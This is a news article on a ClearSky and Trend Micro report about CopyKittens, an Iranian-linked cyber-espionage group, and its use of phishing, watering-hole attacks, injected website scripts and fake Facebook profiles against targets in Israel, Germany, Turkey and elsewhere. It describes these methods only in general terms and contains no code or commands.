New report by Israeli cyber-intelligence firm says CopyKittens lays malware traps, creates fake Facebook pages
An Iranian-linked cyber espionage group called CopyKittens has been targeting governments and institutions globally, including in the US, Israel, Germany, Turkey and Saudi Arabia, security experts say in a new report.
The report, called Wilted Tulip, has been compiled by Israeli cyber security firm ClearSky and multinational Japanese software firm Trend Micro Inc.
It tracks the activities of the group since it was founded in 2013, and says it has targeted victims using self-developed malware and hacking tools that it spreads via emails with links to malicious websites or with malicious attachments.
In March, ClearSky dubbed the group an “Iranian threat agent.”
Facebook profiles have also been used for spreading malicious links and building trust with targets, the report said.
The group has also breached online news outlets and general websites by using them to lay down so-called watering hole attacks, in which a hacker guesses or observes which websites the targeted group is most likely to use, and infects those websites with malware, hoping that eventually some members of the targeted group get infected.
The objective of CopyKittens, said the report, is to gather as much information and data from target organizations as possible, gaining access to “large amounts of documents, spreadsheets, file containing personal data, configuration files and databases.”
Often, when the attackers “get greedy” and infiltrate multiple computers within a network that is breached, they are discovered.
On March 30, 2017, ClearSky reported a breach of multiple websites, such as Jerusalem Post, Maariv news and the IDF Disabled Veterans Organization website.
JavaScript code was inserted into the breached websites, the report said, allowing the attackers to perform actions such as information-gathering and social engineering — like asking for credentials or asking users to install malware, for example.
In 2013, CopyKittens also used several Facebook profiles to spread links to a website impersonating Haaretz news, an Israeli newspaper, the report said.
A fake Erick Brown and Amanda Morgan posted links to malicious websites, and tagged other fake individuals as their cousins.
“While ‘Erik Brown’ has not been publicly active since September 2015, and the two other Israeli profiles have not been publicly active since September 2013, Amanda Morgan is still active to date. She has thousands of friends and 2,630 followers, many of which are Israeli,” the report detailed.
In another incident detailed in the report, members of the German Bundestag were compromised by watering holes positioned within several legitimate websites that were hacked and linked to harmful third-party sites.
A Turkish diplomatic institution was hacked, the report said, and used as a cover to launch a massive spear phishing campaign, with victims receiving a highly targeted message from a legitimate, known source.
“CopyKittens is very persistent, despite lacking technological sophistication and operational discipline,” ClearSky and Trend Micro said in a statement. “These characteristics, however, cause it to be relatively noisy, making it easy to find, monitor and apply counter measures relatively quickly.”
“We’ve been tracking CopyKittens for four years and have become very intimate with its operations,” says Boaz Dolev, CEO of ClearSky,said in the statement.
